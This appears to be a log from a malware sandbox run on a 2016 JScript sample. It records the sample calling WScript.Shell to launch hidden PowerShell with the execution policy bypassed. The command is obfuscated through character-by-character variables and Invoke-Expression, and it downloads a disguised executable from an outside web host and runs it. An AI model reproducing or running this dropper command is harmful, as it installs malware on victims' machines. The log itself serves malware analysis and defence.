14 Dec 20:24:03 - mailware-jail, a malware sandbox ver. 0.10
14 Dec 20:24:03 - ------------------------
14 Dec 20:24:03 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/other.js,env/console.js
14 Dec 20:24:03 - Malware files: malware/20161214/5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.js
14 Dec 20:24:03 - Output file for sandbox dump: sandbox_dump_after.json
14 Dec 20:24:03 - Output directory for generated files: output/
14 Dec 20:24:03 - ==> Preparing Sandbox environment.
14 Dec 20:24:03 - => Executing: env/utils.js quitely
14 Dec 20:24:03 - => Executing: env/eval.js quitely
14 Dec 20:24:03 - => Executing: env/function.js quitely
14 Dec 20:24:03 - => Executing: env/wscript.js quitely
14 Dec 20:24:03 - => Executing: env/other.js quitely
14 Dec 20:24:03 - => Executing: env/console.js quitely
14 Dec 20:24:03 - ==> Executing malware file(s). =========================================
14 Dec 20:24:03 - => Executing: malware/20161214/5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.js verbosely, reporting silent catches
14 Dec 20:24:03 - Saving: output/malware_20161214_5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.js
14 Dec 20:24:03 - WScript.scriptfullname = (string) 'malware/20161214/5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.js'
14 Dec 20:24:03 - WScript.arguments = (object) 'malware/20161214/5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.js,xyz'
14 Dec 20:24:03 - ActiveXObject(wscript.shell)
14 Dec 20:24:03 - new WScript.Shell[2]
14 Dec 20:24:03 - WScript.Shell[2].Run(cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden $migipk='^$';$kqevovde='^p';$unub='^a';$tygnefb='^t';$sbixeg='^h';$tecgerz='^=';$eryse='^(';$avkuvynb='^$';$qzarach='^e';$ciwyro='^n';$ulmezyq='^v';$ymqumnyzj='^:';$bmohetm='^t';$sideq='^e';$jevefbi='^m';$svepqa='^p';$ulvymu='^+';$kaqsa='^''';$izafso='^.';$wlohosky='^e';$silpox='^x';$aqselev='^e';$levfima='^''';$owaqij='^)';$omyjs='^;';$ahzujf='^(';$omitadk='^N';$arybom='^e';$usnakdipt='^w';$unar='^-';$zype='^O';$ezbaxnaj='^b';$otuxxep='^j';$iquxdo='^e';$uchaquf='^c';$ycydnez='^t';$ftyrbi='^ ';$uljenby='^S';$ywacjy='^y';$oxop='^s';$qibragd='^t';$ravafy='^e';$ogavo='^m';$evewzars='^.';$ygwavu='^N';$ulzuvuz='^e';$ulydo='^t';$irkufipd='^.';$abyhy='^W';$fdoggosdi='^e';$have='^b';$gyjacy='^c';$ywelzikl='^l';$mbiwja='^i';$ijif='^e';$soka='^n';$tdytkud='^t';$qubcagk='^)';$avmyf='^.';$kosev='^D';$lolrowbe='^o';$apas='^w';$yvbujo='^n';$otelwuw='^l';$dsobehhu='^o';$oqav='^a';$odbujqypz='^d';$elcyxcyh='^F';$kezdywt='^i';$hcogwo='^l';$jvuhyvj='^e';$afac='^(';$lvutykpu='^''';$qfyctyva='^h';$acwihge='^t';$fizju='^t';$npynep='^p';$ugnevlek='^:';$ugavcy='^/';$rfatcyw='^/';$dujy='^w';$parasy='^w';$opujy='^w';$gtupe='^.';$aprokpal='^k';$abwysy='^i';$agmif='^t';$nheqysje='^d';$ahybt='^o';$yskanagq='^o';$ajrewnasj='^r';$ebvonwukw='^s';$kcokiz='^.';$foby='^r';$mfobjof='^u';$ucim='^/';$xodedbi='^w';$xkyrniplo='^p';$nzolo='^-';$dqycoxo='^c';$cjyxkowm='^o';$wevcish='^n';$csipy='^t';$mvevdiz='^e';$ebezby='^n';$dpedga='^t';$olnozz='^/';$esgafa='^u';$ykix='^p';$quldar='^l';$egxex='^o';$zybgify='^a';$owbudlap='^d';$owlolo='^s';$osbuzbe='^/';$jytykq='^2';$vjesucle='^0';$alduzav='^1';$umijy='^4';$kicni='^/';$ywerho='^0';$murewpo='^1';$urufemc='^/';$ibqehr='^b';$yjixbu='^8';$vozu='^l';$uvaw='^k';$ubawak='^i';$ipfutem='^f';$rutod='^n';$ekaw='^z';$edtafta='^d';$inawy='^/';$ajfegqo='^C';$ufocu='^o';$equst='^u';$zohuza='^p';$dhawo='^o';$nwipikh='^n';$cywiw='^9';$qgochedw='^8';$fyndi
k='^5';$uqeda='^4';$juqaty='^.';$yftifoqw='^p';$sawvif='^d';$dtomu='^f';$yshyxik='^''';$pekretv='^,';$xxavludb='^$';$yrjely='^p';$enuke='^a';$xasmopo='^t';$osybho='^h';$zdomum='^)';$trawomo='^;';$loreh='^ ';$qalci='^S';$dqynnof='^t';$ppysy='^a';$zkytbeb='^r';$ovelf='^t';$lajkixa='^-';$fsebi='^P';$ukpab='^r';$lkura='^o';$rfukopn='^c';$ttawefa='^e';$preffojja='^s';$hlofejqu='^s';$yxnefka='^ ';$fwapywj='^$';$mydri='^p';$cape='^a';$ckukxoq='^t';$kbewifn='^h'; Invoke-Expression ($migipk+$kqevovde+$unub+$tygnefb+$sbixeg+$tecgerz+$eryse+$avkuvynb+$qzarach+$ciwyro+$ulmezyq+$ymqumnyzj+$bmohetm+$sideq+$jevefbi+$svepqa+$ulvymu+$kaqsa+$izafso+$wlohosky+$silpox+$aqselev+$levfima+$owaqij+$omyjs+$ahzujf+$omitadk+$arybom+$usnakdipt+$unar+$zype+$ezbaxnaj+$otuxxep+$iquxdo+$uchaquf+$ycydnez+$ftyrbi+$uljenby+$ywacjy+$oxop+$qibragd+$ravafy+$ogavo+$evewzars+$ygwavu+$ulzuvuz+$ulydo+$irkufipd+$abyhy+$fdoggosdi+$have+$gyjacy+$ywelzikl+$mbiwja+$ijif+$soka+$tdytkud+$qubcagk+$avmyf+$kosev+$lolrowbe+$apas+$yvbujo+$otelwuw+$dsobehhu+$oqav+$odbujqypz+$elcyxcyh+$kezdywt+$hcogwo+$jvuhyvj+$afac+$lvutykpu+$qfyctyva+$acwihge+$fizju+$npynep+$ugnevlek+$ugavcy+$rfatcyw+$dujy+$parasy+$opujy+$gtupe+$aprokpal+$abwysy+$agmif+$nheqysje+$ahybt+$yskanagq+$ajrewnasj+$ebvonwukw+$kcokiz+$foby+$mfobjof+$ucim+$xodedbi+$xkyrniplo+$nzolo+$dqycoxo+$cjyxkowm+$wevcish+$csipy+$mvevdiz+$ebezby+$dpedga+$olnozz+$esgafa+$ykix+$quldar+$egxex+$zybgify+$owbudlap+$owlolo+$osbuzbe+$jytykq+$vjesucle+$alduzav+$umijy+$kicni+$ywerho+$murewpo+$urufemc+$ibqehr+$yjixbu+$vozu+$uvaw+$ubawak+$ipfutem+$rutod+$ekaw+$edtafta+$inawy+$ajfegqo+$ufocu+$equst+$zohuza+$dhawo+$nwipikh+$cywiw+$qgochedw+$fyndik+$uqeda+$juqaty+$yftifoqw+$sawvif+$dtomu+$yshyxik+$pekretv+$xxavludb+$yrjely+$enuke+$xasmopo+$osybho+$zdomum+$trawomo+$loreh+$qalci+$dqynnof+$ppysy+$zkytbeb+$ovelf+$lajkixa+$fsebi+$ukpab+$lkura+$rfukopn+$ttawefa+$preffojja+$hlofejqu+$yxnefka+$fwapywj+$mydri+$cape+$ckukxoq+$kbewifn);;, 0, undefined)
14 Dec 20:24:03 - ==> Cleaning up sandbox.
14 Dec 20:24:03 - ==> Script execution finished, dumping sandbox environment to a file.
14 Dec 20:24:03 - The sandbox context has been saved to: sandbox_dump_after.json